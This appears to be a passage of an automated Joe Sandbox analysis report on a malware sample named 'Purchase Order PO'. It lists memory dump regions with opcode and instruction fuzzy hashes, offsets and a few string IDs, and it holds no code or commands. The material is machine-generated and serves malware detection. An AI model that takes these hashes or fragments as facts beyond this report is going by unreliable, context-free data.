                                                                                                                            • Opcode Fuzzy Hash: adf9c85a44000ccf9aa17a575c4fd80662c9d2d62d88a9db80d2443777bd32f3
                                                                                                                            • Instruction Fuzzy Hash: 7F117071F0020E8BCB14EBB999405EEB6F7BF98214B51416BC549EB304EB35DD16C7A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Te^q
                                                                                                                            • API String ID: 0-671973202
                                                                                                                            • Opcode ID: b10047b1285ee71f5d33973a00f349b765a7c29209539985ef212e90189b87f3
                                                                                                                            • Instruction ID: b54a0a69ef39f780bb6e738fdd3a08aa79006c83cf5c04766a5d500520fd92da
                                                                                                                            • Opcode Fuzzy Hash: b10047b1285ee71f5d33973a00f349b765a7c29209539985ef212e90189b87f3
                                                                                                                            • Instruction Fuzzy Hash: 87115E31B0020E8BCB44EBB999005EEB6F3BB98214B10407AC509EB244EB319E06CBA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 7
                                                                                                                            • API String ID: 0-1790921346
                                                                                                                            • Opcode ID: 1ef45c4bb58fa3c016b12950a8ddf894223895a2ee580291631f77ec3a9ec2eb
                                                                                                                            • Instruction ID: 6d664e5319d52049b3e165bca5f3df4e690dd7e9cddde8b3a7192d867583df7d
                                                                                                                            • Opcode Fuzzy Hash: 1ef45c4bb58fa3c016b12950a8ddf894223895a2ee580291631f77ec3a9ec2eb
                                                                                                                            • Instruction Fuzzy Hash: D9E0C270A1D20CDBCB18EFF4E505AACBBB8EF05304F014596D50593260DA304E99DB81
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6
                                                                                                                            • API String ID: 0-498629140
                                                                                                                            • Opcode ID: e88344bf99cea7c38dbb18a9a4ee280ab553d11c09d13401188470e136c1260c
                                                                                                                            • Instruction ID: 6adaf850ca23291f7341a47c74502a6c8d66997b2f981a76d210e95eb2b1249b
                                                                                                                            • Opcode Fuzzy Hash: e88344bf99cea7c38dbb18a9a4ee280ab553d11c09d13401188470e136c1260c
                                                                                                                            • Instruction Fuzzy Hash: D8E0C231949208DBEB10DFF4E5096ADBFF9EB05301F11819BE40697240EF319A48CB82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c1d7370ca2110a06e56e9a96c1afe33d6166acd0db8f8dd0ee0835ae7f6b26f4
                                                                                                                            • Instruction ID: caee8d7732fc3905dea5c0a61ea46943aa7fd4443be08239671a68438319fc34
                                                                                                                            • Opcode Fuzzy Hash: c1d7370ca2110a06e56e9a96c1afe33d6166acd0db8f8dd0ee0835ae7f6b26f4
                                                                                                                            • Instruction Fuzzy Hash: 9BF10C75A04615DFCB14CF68D588AADBBF6FF88310F16806AE519AB361DB70EC41CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3df363234458849f70b839177919f34f32bdf12bfc3389fce593fd93769a0417
                                                                                                                            • Instruction ID: 9bc2199f3d0ebe0e23f61502785472bb3ade292ad3725c3e54942481c8396a38
                                                                                                                            • Opcode Fuzzy Hash: 3df363234458849f70b839177919f34f32bdf12bfc3389fce593fd93769a0417
                                                                                                                            • Instruction Fuzzy Hash: 6371F234704245CFCB14DF28C898A6A7BEAFF49640F1A41AAEA56CB7A1DB70DC41CB51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6bcbdfaddecd1a3a0634286d5154fc19ef0647b0c067eaaab933578a2d7d1599
                                                                                                                            • Instruction ID: d7f38da249492dfc705b217efea2ccb066a91932e478836f7ffea3441ed679c3
                                                                                                                            • Opcode Fuzzy Hash: 6bcbdfaddecd1a3a0634286d5154fc19ef0647b0c067eaaab933578a2d7d1599
                                                                                                                            • Instruction Fuzzy Hash: 06818278E04219DFCF51CFA8C880AAEBBB6FF49314F118466D919EB211D731AA46CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ae046685f3d4ca32a7c007665a50113e23cc420522ab11f6cf4f7652df72f6f9
                                                                                                                            • Instruction ID: fea71ab4580e06c032e108a4c616ef39fe88c202b8f52ac780c8d793fd788f32
                                                                                                                            • Opcode Fuzzy Hash: ae046685f3d4ca32a7c007665a50113e23cc420522ab11f6cf4f7652df72f6f9
                                                                                                                            • Instruction Fuzzy Hash: 4661B175E116099FDB04CFA9D884AAEBBF2FF49310F118826E915E7250EB30D981CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 386e641c6262505785176ed6454b396d1521806629c21ed8c04de39163076c11
                                                                                                                            • Instruction ID: fb9d3d2dc76db7cdced7de5d8ba66375ee65202905cdfa3cdb3fc307d3d5ba02
                                                                                                                            • Opcode Fuzzy Hash: 386e641c6262505785176ed6454b396d1521806629c21ed8c04de39163076c11
                                                                                                                            • Instruction Fuzzy Hash: A2612A74A00219CFCB44EFA8E5849EEBBB2FF49301F108569E956AB364CF315909CF60
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 32c0335ac089ad6443726e8ce3ed3771c8e783335d505e7d9055410825e2ec34
                                                                                                                            • Instruction ID: d061154f416c2121d4ffcd1633658e6fb5cdeb6e65a50ba2be45bc54e70dbfbe
                                                                                                                            • Opcode Fuzzy Hash: 32c0335ac089ad6443726e8ce3ed3771c8e783335d505e7d9055410825e2ec34
                                                                                                                            • Instruction Fuzzy Hash: AB614C70E047498FDB16CFA5C950BADBBF2BF89304F25861AE949AB341D770A985CF40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a5aed54cdaf8ab87679f5840978b580c2abec45ecd6f095c2ef036195e32ad78
                                                                                                                            • Instruction ID: bfea4888f2e518c27201bdbb70ab8a9a5cd30590de61621ea09b7c3d6191b1f1
                                                                                                                            • Opcode Fuzzy Hash: a5aed54cdaf8ab87679f5840978b580c2abec45ecd6f095c2ef036195e32ad78
                                                                                                                            • Instruction Fuzzy Hash: 2E611974A01219DFCB44EFA8E9849EEBBB2FF49301F108569E915AB364DF315909CB60
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740355301.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_dbd000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3e6117f0fe69a799ac673574c56359dec3854e56041103a8660258a662c20054
                                                                                                                            • Instruction ID: f622e8a7daf2e85d9ed5e480d27859bf6741b29bb283dc310117fd2d4664c491
                                                                                                                            • Opcode Fuzzy Hash: 3e6117f0fe69a799ac673574c56359dec3854e56041103a8660258a662c20054
                                                                                                                            • Instruction Fuzzy Hash: 51210175604200DFCB14EF24D9C4B66BFA6FB88314F24C5ADE84A4B296D33AD847CA71
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740355301.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_dbd000_Purchase Order PO.jbxd
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740259752.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_d1d000_Purchase Order PO.jbxd
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 542561deb7809fa5b96334fcaf7d6ad4046c7c493a5920b8954365b353a56465
                                                                                                                            • Instruction ID: c320ffe985f59efea1a19830e6cda7f7ea9b6b4c44d4f022fc4a2d4220595933
                                                                                                                            • Opcode Fuzzy Hash: 542561deb7809fa5b96334fcaf7d6ad4046c7c493a5920b8954365b353a56465
                                                                                                                            • Instruction Fuzzy Hash: 26F03774E182099BCB04CFA9DA063EEBBF4FB44300F14856A9849E3300DB309A41CB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a7889577794c99b92280e53296fe57f75cc8a6a4869b300bf0f6328db4386326
                                                                                                                            • Instruction ID: 7863d304e76c83905dc978ee8e7421a96e6a5f605d5696ccbbd368fb93aad197
                                                                                                                            • Opcode Fuzzy Hash: a7889577794c99b92280e53296fe57f75cc8a6a4869b300bf0f6328db4386326
                                                                                                                            • Instruction Fuzzy Hash: DDF04F74E04209AFDB40DFA8C4415AEFBF4EB05304F04C49A9814E7340EB719A41CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: add59c37071a51f200861155cf86637ac48d816380e29a8cbdccb66b5aecc257
                                                                                                                            • Instruction ID: f7dc65b1657a0c27290ff62592b7c5a7fb894826b4bffbcb56d8fef79c66b357
                                                                                                                            • Opcode Fuzzy Hash: add59c37071a51f200861155cf86637ac48d816380e29a8cbdccb66b5aecc257
                                                                                                                            • Instruction Fuzzy Hash: 1001FF70804219DFDB14DF5AC8083AEBBF6FF48354F128626E525EA190D7B44A44CF91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 92e8a593a0f57bf2f4639000a99ae983f0a0fc5ecc6e6912a9ddd7006f2f519c
                                                                                                                            • Instruction ID: f86808be54aaf81ddcf571ffab7a1b53db96439559b0e620b21423fbae599a1c
                                                                                                                            • Opcode Fuzzy Hash: 92e8a593a0f57bf2f4639000a99ae983f0a0fc5ecc6e6912a9ddd7006f2f519c
                                                                                                                            • Instruction Fuzzy Hash: E2F0F9B4D1921ADFCB44DFA9D9415AEBBF5FF48300F1084AA9859E3300EB309A00CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3f9e66656f9ddc153d093d85595c063dd3bc328606c2ee494460e8af9fd7f340
                                                                                                                            • Instruction ID: 4cf8fc85ce8175dfe7c65a592cead0cb1d3f5ea65fc5136404f2a1fee17d8aa8
                                                                                                                            • Opcode Fuzzy Hash: 3f9e66656f9ddc153d093d85595c063dd3bc328606c2ee494460e8af9fd7f340
                                                                                                                            • Instruction Fuzzy Hash: F6F0F4B4E1920DDFCB44DFA9D9056AEBBF9FB48300F1095AA9859E3310EB309A50CB51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3282f063b6fc2f4f2de10d3a3ffafa54f8217ec76a2d76378b97f70f608e414b
                                                                                                                            • Instruction ID: e40e9f2f348e796ae3daa4bad20c7c57b223fadf42f3708d6099dd308bc1a64a
                                                                                                                            • Opcode Fuzzy Hash: 3282f063b6fc2f4f2de10d3a3ffafa54f8217ec76a2d76378b97f70f608e414b
                                                                                                                            • Instruction Fuzzy Hash: 3DE039727041286F93049AAEE884D6BBBEEEBCC660311807AF508C7310DA319C0086A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7517396331d242c483b5c3001725a514e3bb04041670ac65e3ca4751bcaabe80
                                                                                                                            • Instruction ID: a9beb47590075cf5358744ffb46f81e6394d0453ad2d4b36f0d5118a84cb45cd
                                                                                                                            • Opcode Fuzzy Hash: 7517396331d242c483b5c3001725a514e3bb04041670ac65e3ca4751bcaabe80
                                                                                                                            • Instruction Fuzzy Hash: B4F0B7B4D09208DFDB44DFA9D9456ADBBF5EB09311F1198ABD859E3300E77496408B41
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0f85979177218db57c21b7601786df2f36e193d14f6533a1025a2a3a887dae5e
                                                                                                                            • Instruction ID: ab3e1547979edc851814d346b158e8dea10bc74db1fbd4410c5ebfad4c475a6e
                                                                                                                            • Opcode Fuzzy Hash: 0f85979177218db57c21b7601786df2f36e193d14f6533a1025a2a3a887dae5e
                                                                                                                            • Instruction Fuzzy Hash: 66F0BEB0D09288DFEB11CFB9C84579DBFF1EB06314F1489AAD895A3341DB398544CB42
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a27f5ccbe6f5fb2cd683aab8e32372fb4ac26afde7ed103138afbef177243ea7
                                                                                                                            • Instruction ID: b0ef4864f0784aa64e03ca16dcfa8a1e075ff9fa381cb9b3bd801bea6c47f451
                                                                                                                            • Opcode Fuzzy Hash: a27f5ccbe6f5fb2cd683aab8e32372fb4ac26afde7ed103138afbef177243ea7
                                                                                                                            • Instruction Fuzzy Hash: 89F03030A141099FCB00EFBCF68668CBFB1EF45358F400AE8E5095B295CF315A46CB51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 774f0bd9e6aa9f274a2eee8c0646c4de42da9282e6f1cfe67522921c2c64f288
                                                                                                                            • Instruction ID: 949bb419a96b48504ef9a52611d4f26546201dd65e3444269123e4d550f8465d
                                                                                                                            • Opcode Fuzzy Hash: 774f0bd9e6aa9f274a2eee8c0646c4de42da9282e6f1cfe67522921c2c64f288
                                                                                                                            • Instruction Fuzzy Hash: D1E0923A9001088ECB00EBA4D8017DCB7B2FFA8304F518037C148D2220D335C9159B51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 98df22d09a4e07b7a02bee61694cc39ab7de50eb14bae52db6c83396bec13627
                                                                                                                            • Instruction ID: 6ed87e94571016c8ed9869d4b39da48a7748a6c32ca2f5704321e589d9b2ad52
                                                                                                                            • Opcode Fuzzy Hash: 98df22d09a4e07b7a02bee61694cc39ab7de50eb14bae52db6c83396bec13627
                                                                                                                            • Instruction Fuzzy Hash: 8FF0F870D10108EFCB40EFBCFA8659CBFB5EB44304F5049A8A509AB254EE306B898B51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b40db6b9cae43834ea6bd6441d85ce3985fd5b7fa8a56509669ad440f3769cf9
                                                                                                                            • Instruction ID: 2465539a77f05b425b3122a6817efcb5b1ed8e0aba0906703aadd13dac136b6b
                                                                                                                            • Opcode Fuzzy Hash: b40db6b9cae43834ea6bd6441d85ce3985fd5b7fa8a56509669ad440f3769cf9
                                                                                                                            • Instruction Fuzzy Hash: 18E0C2709DE10C97CB00EBB4D5046ACBBB9EB05304F01449AD90593250EA304F54D791
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                            • Instruction ID: 161ed210a081d80e3326bec754ab76c4f1d6aec6d034f4e321e6d56addae68fb
                                                                                                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                            • Instruction Fuzzy Hash: 23C08C3320C1283AA278504E7C80EF7BB8ED3C13B4A220137FA5CC334098829C8143F4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6616c678c0fee49a8f0a3b2468326d39c28298bee29f1c15fce0682721b28667
                                                                                                                            • Instruction ID: 7f0ccb0f67f57ad95b1d46207eae0df4f422da9e3fea6573dc548ab8db3cb5f8
                                                                                                                            • Opcode Fuzzy Hash: 6616c678c0fee49a8f0a3b2468326d39c28298bee29f1c15fce0682721b28667
                                                                                                                            • Instruction Fuzzy Hash: 32D0A7311082044FCB04B3B8FA677C9B739FBC0318F705124B04A4BA5DCE789CCA5561
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1bfae1e43ec5b6371b3d82e0b6eee0be996e89fe9b94835973bc1c8645d6a24a
                                                                                                                            • Instruction ID: 0b064464fea755bd314abb6292f477030b146d5b6096d9d9a894dfed891a9349
                                                                                                                            • Opcode Fuzzy Hash: 1bfae1e43ec5b6371b3d82e0b6eee0be996e89fe9b94835973bc1c8645d6a24a
                                                                                                                            • Instruction Fuzzy Hash: 16C012711582484ECA01F779FA57555B77EE6C0304B404520A0090FA2EDF7459C956A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a16994ce2084558c87e73960eb9014a7adbf6435621ec13173bd0e3adf31410c
                                                                                                                            • Instruction ID: fdb74bfd3c8501057dd9e22fe135bd9c543c1cc7f4e5711dbee7b465c1febcd8
                                                                                                                            • Opcode Fuzzy Hash: a16994ce2084558c87e73960eb9014a7adbf6435621ec13173bd0e3adf31410c
                                                                                                                            • Instruction Fuzzy Hash: E5C09B3E1540049E8701F754C9C4C65FFA6FF55304781DC53A345CA034C621D929B752
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 94c359f58620f9e39df8b04ae1f0d4ffc111f04dc404502aa62790ab964d912e
                                                                                                                            • Instruction ID: 90be98159917480011556e02061823b7239e0ab13bdbf68495e0200e2cdbba63
                                                                                                                            • Opcode Fuzzy Hash: 94c359f58620f9e39df8b04ae1f0d4ffc111f04dc404502aa62790ab964d912e
                                                                                                                            • Instruction Fuzzy Hash: 73A00201199BF019E513693C5D757C62F10CB82759F0708DBD1C05E0E654C054899699
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4|cq$4|cq$$^q
                                                                                                                            • API String ID: 0-1027864050
                                                                                                                            • Opcode ID: bfe800c47b810d4219087b47bd7ba9da0ab9c35de333b9ba9e04f57e658bfddd
                                                                                                                            • Instruction ID: 6aac7eef1cfcca6262ccca3cb0cd5e63bbf191eac8226ba933be826ce95b584c
                                                                                                                            • Opcode Fuzzy Hash: bfe800c47b810d4219087b47bd7ba9da0ab9c35de333b9ba9e04f57e658bfddd
                                                                                                                            • Instruction Fuzzy Hash: 6422F4357052618FC715EF3CD8A46AA7BA2BF85310B1644ABD586CF362CE20DC86C7D5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$:$pbq$~
                                                                                                                            • API String ID: 0-999388165
                                                                                                                            • Opcode ID: d2b617d2f4b4eb11824a4049109322099ef4f11546363796df5691c5d0dc58a5
                                                                                                                            • Instruction ID: dbb083d0deb10089e16ae9993cb73a6d43c76d7fa97c59ff3aa74fd971f6f404
                                                                                                                            • Opcode Fuzzy Hash: d2b617d2f4b4eb11824a4049109322099ef4f11546363796df5691c5d0dc58a5
